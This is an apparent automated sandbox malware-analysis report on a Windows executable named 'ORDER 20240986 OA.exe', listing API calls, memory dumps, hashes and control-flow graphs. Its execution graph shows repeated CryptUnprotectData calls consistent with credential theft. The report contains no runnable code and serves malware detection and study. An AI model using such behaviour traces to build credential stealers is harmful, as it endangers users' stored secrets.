                                                                                                                                                  • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                                                                                                  • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                                                                  • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                                                                                                  • GlobalFree.KERNEL32(0083F658), ref: 00403913
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 1100898210-3081826266
                                                                                                                                                  • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                                  • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                                                                                                  • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                                  • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ORDER 20240986 OA.exe,C:\Users\user\Desktop\ORDER 20240986 OA.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ORDER 20240986 OA.exe,C:\Users\user\Desktop\ORDER 20240986 OA.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                  • API String ID: 2709904686-224404859
                                                                                                                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                  • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                                                                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                  • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FBB116A
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB11C7
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB11D9
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FBB1203
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                                  • Opcode ID: 6efcbedcf4d22fea6821c268e4dbfd655d0a51613f3930a1721e48615aadc850
                                                                                                                                                  • Instruction ID: 0f0ffbbc5f9e49018296cdf693cb1a4aaf117fb2a8fd899ab4fb3dd1cfbb2f32
                                                                                                                                                  • Opcode Fuzzy Hash: 6efcbedcf4d22fea6821c268e4dbfd655d0a51613f3930a1721e48615aadc850
                                                                                                                                                  • Instruction Fuzzy Hash: 8931C2B2904241DFEB009F7AF945A7A77F8FB46320B48462EE844D7254EF74E912CB21
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                  • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                  • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:9.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:21.2%
                                                                                                                                                  Total number of Nodes:33
                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                  execution_graph 51724 15e018 51725 15e024 51724->51725 51729 3ae87b69 51725->51729 51733 3ae87b78 51725->51733 51726 15e1d4 51731 3ae87b70 51729->51731 51730 3ae88029 51730->51726 51731->51730 51737 3ae88431 51731->51737 51735 3ae87b9a 51733->51735 51734 3ae88029 51734->51726 51735->51734 51736 3ae88431 CryptUnprotectData 51735->51736 51736->51735 51738 3ae88440 51737->51738 51742 3ae88a68 51738->51742 51750 3ae88a59 51738->51750 51739 3ae884b0 51739->51731 51743 3ae88a8d 51742->51743 51744 3ae88b41 51742->51744 51743->51744 51747 3ae88a68 CryptUnprotectData 51743->51747 51748 3ae88a59 CryptUnprotectData 51743->51748 51758 3ae88c4a 51743->51758 51762 3ae887a8 51744->51762 51747->51744 51748->51744 51751 3ae88a8d 51750->51751 51752 3ae88b41 51750->51752 51751->51752 51755 3ae88a68 CryptUnprotectData 51751->51755 51756 3ae88a59 CryptUnprotectData 51751->51756 51757 3ae88c4a CryptUnprotectData 51751->51757 51753 3ae887a8 CryptUnprotectData 51752->51753 51754 3ae88d0d 51753->51754 51754->51739 51755->51752 51756->51752 51757->51752 51759 3ae88c5d 51758->51759 51760 3ae887a8 CryptUnprotectData 51759->51760 51761 3ae88d0d 51760->51761 51761->51744 51763 3ae88ef8 CryptUnprotectData 51762->51763 51764 3ae88d0d 51763->51764 51764->51739

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 142 15c146-15c158 143 15c184 142->143 144 15c15a-15c172 142->144 145 15c186-15c18a 143->145 148 15c174-15c179 144->148 149 15c17b-15c17e 144->149 148->145 150 15c180-15c182 149->150 151 15c18b-15c199 149->151 150->143 150->144 153 15c126-15c129 151->153 154 15c19b-15c1a1 151->154 155 15c1a3-15c1c8 154->155 156 15c12e-15c130 154->156 159 15c1cf-15c2ac call 1541a0 call 153cc0 155->159 160 15c1ca 155->160 157 15c132-15c135 156->157 158 15c11a-15c11b 156->158 161 15c137-15c145 157->161 162 15c103-15c10a 157->162 163 15c11d-15c120 158->163 164 15c12c 158->164 205 15c2b3-15c2d4 call 155658 159->205 206 15c2ae 159->206 160->159 171 15c097-15c09f 162->171 172 15c10b-15c10f 162->172 166 15c122-15c125 163->166 167 15c0cf-15c0d9 163->167 168 15c131-15c145 164->168 166->153 167->168 170 15c0db-15c0f3 167->170 181 15c118 170->181 187 15c0f5-15c0fb 170->187 184 15c0a0-15c0a4 171->184 185 15c02c-15c05e 171->185 176 15c115-15c117 172->176 177 15c111 172->177 176->181 177->168 180 15c113 177->180 180->176 181->158 188 15c0a6 184->188 189 15c0aa-15c0ac 184->189 196 15c060-15c066 185->196 197 15c0c3-15c0c5 185->197 187->168 191 15c0fd-15c101 187->191 188->168 188->189 192 15c0b1-15c0b4 189->192 191->162 192->164 195 15c0b6-15c0b9 192->195 195->164 198 15c0bb-15c0c1 195->198 196->168 199 15c06c-15c084 196->199 197->166 200 15c0c7-15c0cd 197->200 198->197 202 15c058-15c05e 198->202 199->192 208 15c086-15c08c 199->208 200->166 200->167 202->196 202->197 211 15c2d9-15c2e4 205->211 206->205 208->168 210 15c092-15c096 208->210 210->171 212 15c2e6 211->212 213 15c2eb-15c2ef 211->213 212->213 214 15c2f4-15c2fb 213->214 215 15c2f1-15c2f2 213->215 217 15c302-15c310 214->217 218 15c2fd 214->218 216 15c313-15c357 215->216 222 15c3bd-15c3d4 216->222 217->216 218->217 224 15c3d6-15c3fb 222->224 225 15c359-15c36f 222->225 232 15c413 224->232 233 15c3fd-15c412 224->233 229 15c371-15c37d 225->229 230 15c399 225->230 234 15c387-15c38d 229->234 235 15c37f-15c385 229->235 231 15c39f-15c3bc 230->231 231->222 233->232 236 15c397 234->236 235->236 236->231
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ($0oGp$LjGp$LjGp$PHdq$PHdq$s
                                                                                                                                                  • API String ID: 0-2091801497
                                                                                                                                                  • Opcode ID: 6b53544e97fbc835cea8be569ad59529966d505f9cf53177ecc0a828e0546b45
                                                                                                                                                  • Instruction ID: 57d6544934507306f82035882a84bf302f2f8adb76a372fc8b77869a53007de9
                                                                                                                                                  • Opcode Fuzzy Hash: 6b53544e97fbc835cea8be569ad59529966d505f9cf53177ecc0a828e0546b45
                                                                                                                                                  • Instruction Fuzzy Hash: 89E13E75E04748DFDB14CFA9C894A9DBBF2BF49301F1580A9E819AB262DB349C45CF90

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 240 1529e0-152a3b 244 152a5d-152aac 240->244 245 152a3d-152a5c 240->245 249 152ac7-152acf 244->249 250 152aae-152ab5 244->250 254 152ad2-152ae6 249->254 251 152ab7-152abc 250->251 252 152abe-152ac5 250->252 251->254 252->254 256 152afc-152b04 254->256 257 152ae8-152aef 254->257 260 152b06-152b0a 256->260 258 152af5-152afa 257->258 259 152af1-152af3 257->259 258->260 259->260 262 152b0c-152b21 260->262 263 152b6a-152b6d 260->263 262->263 271 152b23-152b26 262->271 264 152bb5-152bbb 263->264 265 152b6f-152b84 263->265 266 1536b6 264->266 267 152bc1-152bc3 264->267 265->264 275 152b86-152b8a 265->275 272 1536bb-153c65 266->272 267->266 269 152bc9-152bce 267->269 273 153664-153668 269->273 274 152bd4 269->274 276 152b45-152b63 call 1502c8 271->276 277 152b28-152b2a 271->277 294 153c69-153ca4 272->294 280 15366f-1536b5 273->280 281 15366a-15366d 273->281 274->273 282 152b92-152bb0 call 1502c8 275->282 283 152b8c-152b90 275->283 276->263 277->276 278 152b2c-152b2f 277->278 278->263 285 152b31-152b43 278->285 281->272 281->280 282->264 283->264 283->282 285->263 285->276 294->294 296 153ca6-153cd9 294->296 300 153cdb-153cdd 296->300 301 153cea-153cf2 296->301 302 153ce3-153ce8 300->302 303 153cdf-153ce1 300->303 304 153cf4-153d02 301->304 302->304 303->304 307 153d04-153d06 304->307 308 153d18-153d20 304->308 309 153d0f-153d16 307->309 310 153d08-153d0d 307->310 311 153d23-153d26 308->311 309->311 310->311 313 153d3d-153d41 311->313 314 153d28-153d36 311->314 315 153d43-153d51 313->315 316 153d5a-153d5d 313->316 314->313 320 153d38 314->320 315->316 325 153d53 315->325 318 153d65-153d9a 316->318 319 153d5f-153d63 316->319 327 153dfc-153e01 318->327 319->318 322 153d9c-153db3 319->322 320->313 323 153db5-153db7 322->323 324 153db9-153dc5 322->324 323->327 328 153dc7-153dcd 324->328 329 153dcf-153dd9 324->329 325->316 330 153de1 328->330 329->330 331 153ddb 329->331 334 153de9-153df5 330->334 331->330 334->327
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Xhq$Xhq$Xhq$Xhq$Xhq$Xhq
                                                                                                                                                  • API String ID: 0-2119377026
                                                                                                                                                  • Opcode ID: 1f3e797a080d5abc51c750f0ed64623eb1d83296c5fa3fca59f5b2064b9f9985
                                                                                                                                                  • Instruction ID: 330ca980883392674217ea08fb9167176304beec1648321723142df6c3b8382f
                                                                                                                                                  • Opcode Fuzzy Hash: 1f3e797a080d5abc51c750f0ed64623eb1d83296c5fa3fca59f5b2064b9f9985
                                                                                                                                                  • Instruction Fuzzy Hash: 10325DA680D7D48FCB628B7448E815B7FB16F83205BC9459FC4D68B687DB28C609C362
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: >F:$>F:$>F:$N
                                                                                                                                                  • API String ID: 0-1264780443
                                                                                                                                                  • Opcode ID: da95ae6fd28f20ea7e297b981a3e60e9f917c30dcc8857c9425d52ae5b50b41a
                                                                                                                                                  • Instruction ID: d2fd78fe52c84d03968a54f6d34c57a487545de531de8c261464c034cfb66731
                                                                                                                                                  • Opcode Fuzzy Hash: da95ae6fd28f20ea7e297b981a3e60e9f917c30dcc8857c9425d52ae5b50b41a
                                                                                                                                                  • Instruction Fuzzy Hash: 7173D535C107598EDB11EFA8C854AD9FBB1FF99300F51D69AE44867221EB70AAC4CF81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 886 15c738-15c768 887 15c76f-15c84c call 1541a0 call 153cc0 886->887 888 15c76a 886->888 898 15c853-15c874 call 155658 887->898 899 15c84e 887->899 888->887 901 15c879-15c884 898->901 899->898 902 15c886 901->902 903 15c88b-15c88f 901->903 902->903 904 15c894-15c89b 903->904 905 15c891-15c892 903->905 906 15c8a2-15c8b0 904->906 907 15c89d 904->907 908 15c8b3-15c8f7 905->908 906->908 907->906 912 15c95d-15c974 908->912 914 15c976-15c99b 912->914 915 15c8f9-15c90f 912->915 922 15c9b3 914->922 923 15c99d-15c9b2 914->923 919 15c911-15c91d 915->919 920 15c939 915->920 924 15c927-15c92d 919->924 925 15c91f-15c925 919->925 921 15c93f-15c95c 920->921 921->912 923->922 926 15c937 924->926 925->926 926->921
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp$7$LjGp$LjGp$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-2361283832
                                                                                                                                                  • Opcode ID: 7a9894e85be8496a7bc467f18bb0adb8f02e561720ef0385641a95163f305ec8
                                                                                                                                                  • Instruction ID: f160f67191c47abec491d7fd9e88c42c10653ff321674b1fa1c27d405b56d001
                                                                                                                                                  • Opcode Fuzzy Hash: 7a9894e85be8496a7bc467f18bb0adb8f02e561720ef0385641a95163f305ec8
                                                                                                                                                  • Instruction Fuzzy Hash: 8E81F774E00218DFDB14CFAAC984A9DBBF2BF88301F14D069E818AB365DB349985CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1039 155362-155364 1040 1553c4-155484 call 1541a0 call 153cc0 1039->1040 1041 155366-1553a0 1039->1041 1053 155486 1040->1053 1054 15548b-1554a9 1040->1054 1042 1553a7-1553c2 1041->1042 1043 1553a2 1041->1043 1042->1040 1043->1042 1053->1054 1084 1554ac call 155649 1054->1084 1085 1554ac call 155658 1054->1085 1055 1554b2-1554bd 1056 1554c4-1554c8 1055->1056 1057 1554bf 1055->1057 1058 1554cd-1554d4 1056->1058 1059 1554ca-1554cb 1056->1059 1057->1056 1061 1554d6 1058->1061 1062 1554db-1554e9 1058->1062 1060 1554ec-155530 1059->1060 1066 155596-1555ad 1060->1066 1061->1062 1062->1060 1068 155532-155548 1066->1068 1069 1555af-1555d4 1066->1069 1073 155572 1068->1073 1074 15554a-155556 1068->1074 1075 1555d6-1555eb 1069->1075 1076 1555ec 1069->1076 1079 155578-155595 1073->1079 1077 155560-155566 1074->1077 1078 155558-15555e 1074->1078 1075->1076 1080 155570 1077->1080 1078->1080 1079->1066 1080->1079 1084->1055 1085->1055
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-1273542581
                                                                                                                                                  • Opcode ID: 37bf2de3ad624ec1f66b8ca3b3a38713e57b4bb56cafb92f350cd6a228b82015
                                                                                                                                                  • Instruction ID: 2a5b733a5dff7028c5f6aa2db0bc3f0dfc03240f6d4db353df3865e0c3ac1be4
                                                                                                                                                  • Opcode Fuzzy Hash: 37bf2de3ad624ec1f66b8ca3b3a38713e57b4bb56cafb92f350cd6a228b82015
                                                                                                                                                  • Instruction Fuzzy Hash: 1591D474E00618CFDB18CFA9C894A9DBBF2BF89301F15D069E819AB361DB349985CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1086 15ca08-15ca38 1088 15ca3f-15cb1c call 1541a0 call 153cc0 1086->1088 1089 15ca3a 1086->1089 1099 15cb23-15cb44 call 155658 1088->1099 1100 15cb1e 1088->1100 1089->1088 1102 15cb49-15cb54 1099->1102 1100->1099 1103 15cb56 1102->1103 1104 15cb5b-15cb5f 1102->1104 1103->1104 1105 15cb64-15cb6b 1104->1105 1106 15cb61-15cb62 1104->1106 1108 15cb72-15cb80 1105->1108 1109 15cb6d 1105->1109 1107 15cb83-15cbc7 1106->1107 1113 15cc2d-15cc44 1107->1113 1108->1107 1109->1108 1115 15cc46-15cc6b 1113->1115 1116 15cbc9-15cbdf 1113->1116 1122 15cc83 1115->1122 1123 15cc6d-15cc82 1115->1123 1120 15cbe1-15cbed 1116->1120 1121 15cc09 1116->1121 1124 15cbf7-15cbfd 1120->1124 1125 15cbef-15cbf5 1120->1125 1126 15cc0f-15cc2c 1121->1126 1123->1122 1127 15cc07 1124->1127 1125->1127 1126->1113 1127->1126
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-1273542581
                                                                                                                                                  • Opcode ID: b6824d6479cee8506dd3ce2d4dfd2a966ce19798b4c9c5b79626738808ac54dc
                                                                                                                                                  • Instruction ID: 6f3b02cee6c09856919bcb24d2f8c183a9541e4a502c137f9306e3a230952d3e
                                                                                                                                                  • Opcode Fuzzy Hash: b6824d6479cee8506dd3ce2d4dfd2a966ce19798b4c9c5b79626738808ac54dc
                                                                                                                                                  • Instruction Fuzzy Hash: FD81B774E00218DFDB14DFAAC894A9DBBF2BF89301F14D069E819AB365DB349985CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1131 15cfaa-15cfd8 1132 15cfdf-15d0bc call 1541a0 call 153cc0 1131->1132 1133 15cfda 1131->1133 1143 15d0c3-15d0e4 call 155658 1132->1143 1144 15d0be 1132->1144 1133->1132 1146 15d0e9-15d0f4 1143->1146 1144->1143 1147 15d0f6 1146->1147 1148 15d0fb-15d0ff 1146->1148 1147->1148 1149 15d104-15d10b 1148->1149 1150 15d101-15d102 1148->1150 1151 15d112-15d120 1149->1151 1152 15d10d 1149->1152 1153 15d123-15d167 1150->1153 1151->1153 1152->1151 1157 15d1cd-15d1e4 1153->1157 1159 15d1e6-15d20b 1157->1159 1160 15d169-15d17f 1157->1160 1167 15d223 1159->1167 1168 15d20d-15d222 1159->1168 1164 15d181-15d18d 1160->1164 1165 15d1a9 1160->1165 1169 15d197-15d19d 1164->1169 1170 15d18f-15d195 1164->1170 1166 15d1af-15d1cc 1165->1166 1166->1157 1168->1167 1171 15d1a7 1169->1171 1170->1171 1171->1166
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
